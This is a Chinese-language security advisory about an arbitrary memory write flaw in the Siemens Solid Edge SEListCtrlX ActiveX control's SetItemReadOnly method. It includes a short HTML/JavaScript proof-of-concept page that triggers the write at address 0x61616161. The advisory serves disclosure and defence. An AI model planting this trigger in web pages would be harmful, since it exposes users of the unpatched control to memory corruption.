Siemens Solid Edge SEListCtrlX ActiveX内存破坏漏洞

发布日期：2013-05-26
更新日期：2013-05-30受影响系统：
Siemens Solid Edge ST5 105.x
Siemens SEListCtrlX ActiveX Control 105.x
Siemens WebPartHelper ActiveX Control 105.x
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 60161

SolidEdge是Siemens PLM Software公司旗下的三维CAD软件，采用Siemens PLM Software公司自己拥有专利的Parasolid作为软件核心，将普及型CAD系统与世界上最具领先地位的实体造型引擎结合在一起，是基于Windows平台、功能强大且易用的三维CAD软件。

Siemens Solid Edge SEListCtrlX ActiveX控件内存在不安全的方法 "SetItemReadOnly（）" （SEListCTRLX.ocx），可使远程攻击者在任意内存位置写入一些值。

<*来源：rgod （rgod@autistici.org）

链接：http://secunia.com/advisories/53595/
http://retrogod.altervista.org/9sg_siemens_adv_ii.htm
*>测试方法：
--------------------------------------------------------------------------------警告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
<！-- saved from url=（0014）about:internet -->
<html>
<object classid="clsid:5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D" id="obj" />
</object>
<script language="javascript">
//obj.SetItemReadOnly（0x61616161,false）;
obj.SetItemReadOnly（0x61616161,true）;
</script>建议：
--------------------------------------------------------------------------------
厂商补丁：

Siemens
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.plm.automation.siemens.com/en_us/products/velocity/forms/solid-edge-student.cfmLG Optimus G E973命令注入漏洞（CVE-2013-3666）Rails 框架遭受持续不断的攻击波相关资讯 Siemens

Siemens Scalance X200系列交换机（05/29/2013 19:28:54）

本文评论查看全部评论（0）

评论声明

尊重网上道德，遵守中华人民共和国的各项有关法律法规
承担一切因您的行为而直接或间接导致的民事或刑事法律责任